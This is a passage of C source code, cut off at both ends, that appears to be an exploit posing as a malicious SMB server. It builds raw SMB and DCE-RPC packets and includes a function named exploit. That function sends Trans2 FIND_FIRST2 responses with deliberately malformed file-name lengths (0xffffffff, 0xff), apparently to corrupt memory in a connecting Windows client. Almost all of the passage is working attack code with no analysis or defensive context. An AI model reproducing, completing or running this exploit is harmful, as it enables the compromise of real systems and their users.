x6d\\x00\\x6f\\x00\"\n\"\\x74\\x00\\x65\\x00\\x61\\x00\\x64\\x00\\x6d\\x00\\x69\\x00\\x6e\\x00\\x00\\x00\"\n\"\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x43\\x00\\x24\\x00\"\n\"\\x00\\x00\\x39\\x00\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00\"\n\"\\x53\\x00\\x74\\x00\\x61\\x00\\x6e\\x00\\x64\\x00\\x61\\x00\\x72\\x00\\x64\\x00\"\n\"\\x66\\x00\\x72\\x00\\x65\\x00\\x69\\x00\\x67\\x00\\x61\\x00\\x62\\x00\\x65\\x00\"\n\"\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\n\nunsigned char OpenPrinterEx[] =\n\"\\x00\\x00\\x00\\x68\"\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\"\\x30\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x24\\xd7\\x9c\\xf8\\xbb\\xe1\\xd9\\x11\\xb9\\x29\\x00\\x10\"\n\"\\xdc\\x4a\\x6b\\xbb\\x00\\x00\\x00\\x00\";\n\nunsigned char ClosePrinter[] =\n\"\\x00\\x00\\x00\\x68\"\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\"\\x30\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\n\nunsigned char OpenHklm[] =\n\"\\x00\\x00\\x00\\x68\"\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\"\\x30\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x4e\\x4c\\xb2\\xf8\\xbb\\xe1\\xd9\\x11\\xb9\\x29\\x00\\x10\"\n\"\\xdc\\x4a\\x6b\\xbb\\x00\\x00\\x00\\x00\";\n\nunsigned char OpenKey[] =\n\"\\x00\\x00\\x00\\x68\"\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\"\\x30\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\";\n\nunsigned char CloseKey[] =\n\"\\x00\\x00\\x00\\x68\"\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\"\\x30\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\n\nunsigned char NetBios1[] =\n\"\\x00\\x00\\x00\\x94\"\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x0a\\x00\\x00\\x5c\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x5c\\x00\\x38\"\n\"\\x00\\x00\\x00\\x00\\x00\\x5d\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\"\\x5c\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x44\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x01\\x00\\x00\\x00\\xc0\\xa2\\x16\\x00\\xae\\xc2\\x16\\x00\\x00\\x00\\x00\\x00\"\n\"\\xbe\\xc2\\x16\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\"\n\"\\x6e\\x00\\x65\\x00\\x74\\x00\\x62\\x00\\x69\\x00\\x6f\\x00\\x73\\x00\\x00\\x00\"\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x2e\\x00\"\n\"\\x00\\x00\\x00\\x00\";\n\nunsigned char NetBios2[] =\n\"\\x00\\x00\\x00\\x3e\"\n\"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x07\\xff\\x00\\x3e\\x00\\x01\\x00\\xff\\x01\\x00\\x00\\xff\\x01\\x00\\x00\\x0d\"\n\"\\x00\\x41\\x3a\\x00\\x4e\\x00\\x54\\x00\\x46\\x00\\x53\\x00\\x00\\x00\";\n\n// Trans2 Response, QUERY_PATH_INFO\nunsigned char Trans2Response1[] =\n\"\\x00\\x00\\x00\\x64\"\n\"\\xff\\x53\\x4d\\x42\" // SMB\n\"\\x32\" // SMB Command: Trans2 (0x32)\n\"\\x00\\x00\\x00\\x00\" // NT Status: STATUS_SUCCESS (0x00000000)\n\"\\x98\" // Flags: 0x98\n\"\\x07\\xc8\" // Flags2 : 0xc807\n\"\\x00\\x00\" // Process ID High: 0\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\n\"\\x00\\x00\" // Reserved: 0000\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x0a\" // Word Count (WCT): 10\n\"\\x02\\x00\" // Total Parameter Count: 2\n\"\\x28\\x00\" // Total Data Count: 40\n\"\\x00\\x00\" // Reserved: 0000\n\"\\x02\\x00\" // Parameter Count: 2\n\"\\x38\\x00\" // Parameter Offset: 56\n\"\\x00\\x00\" // Parameter Displacement: 0\n\"\\x28\\x00\" // Data Count: 40\n\"\\x3c\\x00\" // Data Offset: 60\n\"\\x00\\x00\" // Data Displacement: 0\n\"\\x00\" // Setup Count: 0\n\"\\x00\" // Reserved: 00\n\"\\x2d\\x00\" // Byte Count (BCC): 45\n\"\\x00\" // Padding: 00\n\"\\x00\\x00\" // EA Error offset: 0\n\"\\x00\\x01\" // Padding: 0001\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Created: Jun 17, 2005 05:39:19.686500000\n\"\\x8c\\x24\\xba\\x5c\\x3a\\x73\\xc5\\x01\" // Last Access: Jun 17, 2005 05:44:55.092750000\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Last Write: Jun 17, 2005 05:39:19.686500000\n\"\\x9c\\x81\\x67\\x98\\x39\\x73\\xc5\\x01\" // Change: Jun 17, 2005 05:39:25.717750000\n\"\\x10\\x00\\x00\\x00\" // File Attributes: 0x00000010\n\"\\x00\\x00\\x00\\x00\"; // Unknown Data: 00000000\n\n// Trans2 Response, QUERY_PATH_INFO\nunsigned char Trans2Response2[] = // ERROR Response\n\"\\x00\\x00\\x00\\x23\"\n\"\\xff\\x53\\x4d\\x42\\x32\\x34\\x00\\x00\\xc0\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x00\\x00\\x00\";\n\n// Trans2 Response, FIND_FIRST2, Files: . ..\nunsigned char Trans2Response3[] =\n\"\\x00\\x00\\x01\\x0c\"\n\"\\xff\\x53\\x4d\\x42\" // SMB\n\"\\x32\" // SMB Command: Trans2 (0x32)\n\"\\x00\\x00\\x00\\x00\" // NT Status: STATUS_SUCCESS (0x00000000)\n\"\\x98\" // Flags: 0x98\n\"\\x07\\xc8\" // Flags2 : 0xc807\n\"\\x00\\x00\" // Process ID High: 0\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\n\"\\x00\\x00\" // Reserved: 0000\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x0a\" // Word Count (WCT): 10\n\"\\x0a\\x00\" // Total Parameter Count: 10\n\"\\xc8\\x00\" // Total Data Count: 200\n\"\\x00\\x00\" // Reserved: 0000\n\"\\x0a\\x00\" // Parameter Count: 10\n\"\\x38\\x00\" // Parameter Offset: 56\n\"\\x00\\x00\" // Parameter Displacement: 0\n\"\\xc8\\x00\" // Data Count: 200\n\"\\x44\\x00\" // Data Offset: 68\n\"\\x00\\x00\" // Data Displacement: 0\n\"\\x00\" // Setup Count: 0\n\"\\x00\" // Reserved: 00\n\"\\xd5\\x00\" // Byte Count (BCC): 213\n\"\\x00\" // Padding: 00\n\"\\x01\\x08\" // Search ID: 0x0801\n\"\\x02\\x00\" // Seatch Count: 2\n\"\\x01\\x00\" // End of Search: 1\n\"\\x00\\x00\" // EA Error offset: 0\n\"\\x60\\x00\" // Last Name offset: 96\n\"\\x38\\x00\" // Padding: 3800\n\"\\x60\\x00\\x00\\x00\" // Next Entry offset: 96\n\"\\x00\\x00\\x00\\x00\" // File Index: 0\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Created: Jun 17, 2005 05:39:19.686500000\n\"\\xac\\x09\\x3c\\xae\\x39\\x73\\xc5\\x01\" // Last Access: Jun 17, 2005 05:40:02.342750000\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Last Write: Jun 17, 2005 05:39:19.686500000\n\"\\x9c\\x81\\x67\\x98\\x39\\x73\\xc5\\x01\" // Change: Jun 17, 2005 05:39:25.717750000\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // End of File: 0\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Allocation Size: 0\n\"\\x10\\x00\\x00\\x00\" // File Attributes: 0x00000010\n//\"\\x02\\x00\\x00\\x00\" // File Name Len: 2\n\"\\xff\\xff\\xff\\xff\" // Bad File Name Len\n\"\\x00\\x00\\x00\\x00\" // EA List Length: 0\n//\"\\x00\" // Short File Name Len: 0\n\"\\xff\" // Bad Short File Name Len\n\"\\x00\" // Reserved: 00\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\n\"\\x2e\\x00\" // File Name: .\n\"\\x00\\x00\\x00\\x00\" // Next Entry Offset: 0\n\"\\x00\\x00\\x00\\x00\" // File Index: 0\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Created: Jun 17, 2005 05:39:19.686500000\n\"\\xac\\x09\\x3c\\xae\\x39\\x73\\xc5\\x01\" // Last Access: Jun 17, 2005 05:40:02.342750000\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Last Write: Jun 17, 2005 05:39:19.686500000\n\"\\x9c\\x81\\x67\\x98\\x39\\x73\\xc5\\x01\" // Change: Jun 17, 2005 05:39:25.717750000\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // End Of File: 0\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Allocation Size: 0\n\"\\x10\\x00\\x00\\x00\" // File Attributes: 0x00000010\n\"\\x04\\x00\\x00\\x00\" // File Name Len: 4\n\"\\x00\\x00\\x00\\x00\" // EA List Length: 0\n\"\\x00\" // Short File Name Len: 0\n\"\\x00\" // Reserved: 00\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\n\"\\x2e\\x00\\x2e\\x00\" // File Name: ..\n\"\\x00\\x00\\x00\\x00\\x00\\x00\"; // Unknown Data: 000000000000\n\nint\ncheck_interface ( char* str )\n{\n\tint i, j, wks = 0, srv = 0, spl = 0, wrg = 0, foo = 0;\n\n\t//Interface UUID\n\tunsigned char wks_uuid[] = \"\\x98\\xd0\\xff\\x6b\\x12\\xa1\\x10\\x36\\x98\\x33\\x46\\xc3\\xf8\\x7e\\x34\\x5a\";\n\tunsigned char srv_uuid[] = \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\";\n\tunsigned char spl_uuid[] = \"\\x78\\x56\\x34\\x12\\x34\\x12\\xcd\\xab\\xef\\x00\\x01\\x23\\x45\\x67\\x89\\xab\";\n\tunsigned char wrg_uuid[] = \"\\x01\\xd0\\x8c\\x33\\x44\\x22\\xf1\\x31\\xaa\\xaa\\x90\\x00\\x38\\x00\\x10\\x03\";\n\n\tfor ( i = 0; i < 16; i++ )\n\t{\n\t\tj = 0;\n\t\tif ( str[120 + i] < 0 )\n\t\t{\n\t\t\tif ( ( str[120 + i] + 0x100 ) == wks_uuid[i] )\n\t\t\t\t{ wks++; j = 1; }\n\t\t\tif ( ( str[120 + i] + 0x100 ) == srv_uuid[i] )\n\t\t\t\t{ srv++; j = 1; }\n\t\t\tif ( ( str[120 + i] + 0x100 ) == spl_uuid[i] )\n\t\t\t\t{ spl++; j = 1; }\n\t\t\tif ( ( str[120 + i] + 0x100 ) == wrg_uuid[i] )\n\t\t\t\t{ wrg++; j = 1; }\n\t\t\tif ( j == 0 )\n\t\t\t\tfoo++;\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif ( str[120 + i] == wks_uuid[i] )\n\t\t\t\t{ wks++; j = 1; }\n\t\t\tif ( str[120 + i] == srv_uuid[i] )\n\t\t\t\t{ srv++; j = 1; }\n\t\t\tif ( str[120 + i] == spl_uuid[i] )\n\t\t\t\t{ spl++; j = 1; }\n\t\t\tif ( str[120 + i] == wrg_uuid[i] )\n\t\t\t\t{ wrg++; j = 1; }\n\t\t\tif ( j == 0 )\n\t\t\t\tfoo++;\n\t\t}\n\t}\n\tif ( wks == 16 )\n\t\treturn ( 0 );\n\telse if ( srv == 16 )\n\t\treturn ( 1 );\n\telse if ( spl == 16 )\n\t\treturn ( 2 );\n\telse if ( wrg == 16 )\n\t\treturn ( 3 );\n\telse\n\t{\n\t\tprintf ( \"there is/are %d invalid byte(s) in the interface UUID!\\n\", foo );\n\t\treturn ( -1 );\n\t}\n}\n\nvoid\nneg ( int s )\n{\n\tchar response[1024];\n\n\tbzero ( &response, sizeof ( response ) );\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\tsend ( s, SmbNeg, sizeof ( SmbNeg ) -1, 0 );\n}\n\nvoid\nsessionsetup ( int s, unsigned long userid, unsigned long treeid, int option )\n{\n\tchar response[1024];\n\tunsigned char ntlm_challenge1[] = \"\\xa2\\x75\\x1b\\x10\\xe7\\x62\\xb0\\xc3\";\n\tunsigned char ntlm_challenge2[] = \"\\xe1\\xed\\x43\\x66\\xc7\\xa7\\x36\\xbd\";\n\n\tbzero ( &response, sizeof ( response ) );\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\tprintf ( \"SessionSetupAndXNeg\\n\" );\n\tSessionSetupAndXNeg[30] = response[30];\n\tSessionSetupAndXNeg[31] = response[31];\n\tSessionSetupAndXNeg[34] = response[34];\n\tSessionSetupAndXNeg[35] = response[35];\n\n\tstrncpy ( SessionSetupAndXNeg + 32, ( unsigned char* ) &userid, 2 );\n\tif ( option == 0 )\n\t\tmemcpy ( SessionSetupAndXNeg + 71, ntlm_challenge1, 8 );\n\telse\n\t\tmemcpy ( SessionSetupAndXNeg + 71, ntlm_challenge2, 8 );\n\n\tsend ( s, SessionSetupAndXNeg, sizeof ( SessionSetupAndXNeg ) -1, 0 );\n\n\tbzero ( &response, sizeof ( response ) );\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\tprintf ( \"SessionSetupAndXAuth\\n\" );\n\tSessionSetupAndXAuth[30] = response[30];\n\tSessionSetupAndXAuth[31] = response[31];\n\tSessionSetupAndXAuth[34] = response[34];\n\tSessionSetupAndXAuth[35] = response[35];\n\n\tstrncpy ( SessionSetupAndXAuth + 32, ( unsigned char* ) &userid, 2 );\n\n\tsend ( s, SessionSetupAndXAuth, sizeof ( SessionSetupAndXAuth ) -1, 0 );\n\n\tbzero ( &response, sizeof ( response ) );\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\tprintf ( \"TreeConnectAndX\\n\" );\n\tTreeConnectAndX[30] = response[30];\n\tTreeConnectAndX[31] = response[31];\n\tTreeConnectAndX[34] = response[34];\n\tTreeConnectAndX[35] = response[35];\n\n\tstrncpy ( TreeConnectAndX + 28, ( unsigned char* ) &treeid, 2 );\n\tstrncpy ( TreeConnectAndX + 32, ( unsigned char* ) &userid, 2 );\n\n\tsend ( s, TreeConnectAndX, sizeof ( TreeConnectAndX ) -1, 0 );\n}\n\nvoid\ndigg ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid, int option )\n{\n\tint ret;\n\tchar response[1024];\n\tunsigned char srv[] = \"\\x73\\x72\\x76\";\n\tunsigned char wks[] = \"\\x77\\x6b\\x73\";\n\n\tbzero ( &response, sizeof ( response ) );\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\tprintf ( \"SmbNtCreate\\n\" );\n\tSmbNtCreate[30] = response[30];\n\tSmbNtCreate[31] = response[31];\n\tSmbNtCreate[34] = response[34];\n\tSmbNtCreate[35] = response[35];\n\n\tstrncpy ( SmbNtCreate + 28, ( unsigned char* ) &treeid, 2 );\n\tstrncpy ( SmbNtCreate + 32, ( unsigned char* ) &userid, 2 );\n\tstrncpy ( SmbNtCreate + 42, ( unsigned char* ) &fid, 2 );\n\n\tsend ( s, SmbNtCreate, sizeof ( SmbNtCreate ) -1, 0 );\n\n\tbzero ( &response, sizeof ( response ) );\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\tprintf ( \"DceRpc\\n\" );\n\tDceRpc[30] = response[30];\n\tDceRpc[31] = response[31];\n\tDceRpc[34] = response[34];\n\tDceRpc[35] = response[35];\n\n\tstrncpy ( DceRpc + 28, ( unsigned char* ) &treeid, 2 );\n\tstrncpy ( DceRpc + 32, ( unsigned char* ) &userid, 2 );\n\tstrncpy ( DceRpc + 80, ( unsigned char* ) &assocgroup, 2 );\n\n\tret = check_interface ( response );\n\tif ( ret == 0 )\n\t\tmemcpy ( DceRpc + 92, wks, 3 );\n\telse if ( ret == 1 )\n\t\tmemcpy ( DceRpc + 92, srv, 3 );\n\telse if ( ret == 2 );\n\telse if ( ret == 3 );\n\telse\n\t{\n\t\tprintf ( \"invalid interface uuid, aborting...\\n\" );\n\t\texit ( 1 );\n\t}\n\n\tsend ( s, DceRpc, sizeof ( DceRpc ) -1, 0 );\n\n\tbzero ( &response, sizeof ( response ) );\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\tif ( option == 1 )\n\t{\n\t\tprintf ( \"NetrShareEnum\\n\" );\n\t\tNetrShareEnum[30] = response[30];\n\t\tNetrShareEnum[31] = response[31];\n\t\tNetrShareEnum[34] = response[34];\n\t\tNetrShareEnum[35] = response[35];\n\n\t\tstrncpy ( NetrShareEnum + 28, ( unsigned char* ) &treeid, 2 );\n\t\tstrncpy ( NetrShareEnum + 32, ( unsigned char* ) &userid, 2 );\n\n\t\tsend ( s, NetrShareEnum, sizeof ( NetrShareEnum ) -1, 0 );\n\t}\n\telse if ( ( option == 2 ) && ( ret == 2 ) )\n\t{\n\t\tprintf ( \"OpenPrinterEx\\n\" );\n\t\tOpenPrinterEx[30] = response[30];\n\t\tOpenPrinterEx[31] = response[31];\n\t\tOpenPrinterEx[34] = response[34];\n\t\tOpenPrinterEx[35] = response[35];\n\n\t\tstrncpy ( OpenPrinterEx + 28, ( unsigned char* ) &treeid, 2 );\n\t\tstrncpy ( OpenPrinterEx + 32, ( unsigned char* ) &userid, 2 );\n\n\t\tsend ( s, OpenPrinterEx, sizeof ( OpenPrinterEx ) -1, 0 );\n\n\t\tbzero ( &response, sizeof ( response ) );\n\t\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\t\tprintf ( \"ClosePrinter\\n\" );\n\t\tClosePrinter[30] = response[30];\n\t\tClosePrinter[31] = response[31];\n\t\tClosePrinter[34] = response[34];\n\t\tClosePrinter[35] = response[35];\n\n\t\tstrncpy ( ClosePrinter + 28, ( unsigned char* ) &treeid, 2 );\n\t\tstrncpy ( ClosePrinter + 32, ( unsigned char* ) &userid, 2 );\n\n\t\tsend ( s, ClosePrinter, sizeof ( ClosePrinter ) -1, 0 );\n\t}\n\telse if ( ( option == 3 ) && ( ret == 3 ) )\n\t{\n\t\tprintf ( \"OpenHklm\\n\" );\n\t\tOpenHklm[30] = response[30];\n\t\tOpenHklm[31] = response[31];\n\t\tOpenHklm[34] = response[34];\n\t\tOpenHklm[35] = response[35];\n\n\t\tstrncpy ( OpenHklm + 28, ( unsigned char* ) &treeid, 2 );\n\t\tstrncpy ( OpenHklm + 32, ( unsigned char* ) &userid, 2 );\n\n\t\tsend ( s, OpenHklm, sizeof ( OpenHklm ) -1, 0 );\n\n\t\tbzero ( &response, sizeof ( response ) );\n\t\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\t\tprintf ( \"OpenKey\\n\" );\n\t\tOpenKey[30] = response[30];\n\t\tOpenKey[31] = response[31];\n\t\tOpenKey[34] = response[34];\n\t\tOpenKey[35] = response[35];\n\n\t\tstrncpy ( OpenKey + 28, ( unsigned char* ) &treeid, 2 );\n\t\tstrncpy ( OpenKey + 32, ( unsigned char* ) &userid, 2 );\n\n\t\tsend ( s, OpenKey, sizeof ( OpenKey ) -1, 0 );\n\n\t\tbzero ( &response, sizeof ( response ) );\n\t\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\t\tprintf ( \"CloseKey\\n\" );\n\t\tCloseKey[30] = response[30];\n\t\tCloseKey[31] = response[31];\n\t\tCloseKey[34] = response[34];\n\t\tCloseKey[35] = response[35];\n\n\t\tstrncpy ( CloseKey + 28, ( unsigned char* ) &treeid, 2 );\n\t\tstrncpy ( CloseKey + 32, ( unsigned char* ) &userid, 2 );\n\n\t\tsend ( s, CloseKey, sizeof ( CloseKey ) -1, 0 );\n\t}\n\telse if ( option == 4 )\n\t{\n\t\tprintf ( \"NetBios1\\n\" );\n\t\tNetBios1[30] = response[30];\n\t\tNetBios1[31] = response[31];\n\t\tNetBios1[34] = response[34];\n\t\tNetBios1[35] = response[35];\n\n\t\tstrncpy ( NetBios1 + 28, ( unsigned char* ) &treeid, 2 );\n\t\tstrncpy ( NetBios1 + 32, ( unsigned char* ) &userid, 2 );\n\n\t\tsend ( s, NetBios1, sizeof ( NetBios1 ) -1, 0 );\n\t}\n\telse\n\t{\n\t\tif ( ret == 0 )\n\t\t{\n\t\t\tprintf ( \"WksSvc\\n\" );\n\t\t\tWksSvc[30] = response[30];\n\t\t\tWksSvc[31] = response[31];\n\t\t\tWksSvc[34] = response[34];\n\t\t\tWksSvc[35] = response[35];\n\n\t\t\tstrncpy ( WksSvc + 28, ( unsigned char* ) &treeid, 2 );\n\t\t\tstrncpy ( WksSvc + 32, ( unsigned char* ) &userid, 2 );\n\n\t\t\tsend ( s, WksSvc, sizeof ( WksSvc ) -1, 0 );\n\t\t}\n\t\telse\n\t\t{\n\t\t\tprintf ( \"SrvSvc\\n\" );\n\t\t\tSrvSvc[30] = response[30];\n\t\t\tSrvSvc[31] = response[31];\n\t\t\tSrvSvc[34] = response[34];\n\t\t\tSrvSvc[35] = response[35];\n\n\t\t\tstrncpy ( SrvSvc + 28, ( unsigned char* ) &treeid, 2 );\n\t\t\tstrncpy ( SrvSvc + 32, ( unsigned char* ) &userid, 2 );\n\n\t\t\tsend ( s, SrvSvc, sizeof ( SrvSvc ) -1, 0 );\n\t\t}\n\t}\n\n\tbzero ( &response, sizeof ( response ) );\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\tprintf ( \"SmbClose\\n\" );\n\tSmbClose[30] = response[30];\n\tSmbClose[31] = response[31];\n\tSmbClose[34] = response[34];\n\tSmbClose[35] = response[35];\n\n\tstrncpy ( SmbClose + 28, ( unsigned char* ) &treeid, 2 );\n\tstrncpy ( SmbClose + 32, ( unsigned char* ) &userid, 2 );\n\n\tsend ( s, SmbClose, sizeof ( SmbClose ) -1, 0 );\n}\n\nvoid\nexploit ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid )\n{\n\tchar response[1024];\n\n\tbzero ( &response, sizeof ( response ) );\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\tprintf ( \"NetBios2\\n\" );\n\tNetBios2[30] = response[30];\n\tNetBios2[31] = response[31];\n\tNetBios2[34] = response[34];\n\tNetBios2[35] = response[35];\n\n\tstrncpy ( NetBios2 + 28, ( unsigned char* ) &treeid, 2 );\n\tstrncpy ( NetBios2 + 32, ( unsigned char* ) &userid, 2 );\n\n\tsend ( s, NetBios2, sizeof ( NetBios2 ) -1, 0 );\n\n\tbzero ( &response, sizeof ( response ) );\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\tprintf ( \"Trans2Response1\\n\" );\n\tTrans2Response1[30] = response[30];\n\tTrans2Response1[31] = response[31];\n\tTrans2Response1[34] = response[34];\n\tTrans2Response1[35] = response[35];\n\n\tstrncpy ( Trans2Response1 + 28, ( unsigned char* ) &treeid, 2 );\n\tstrncpy ( 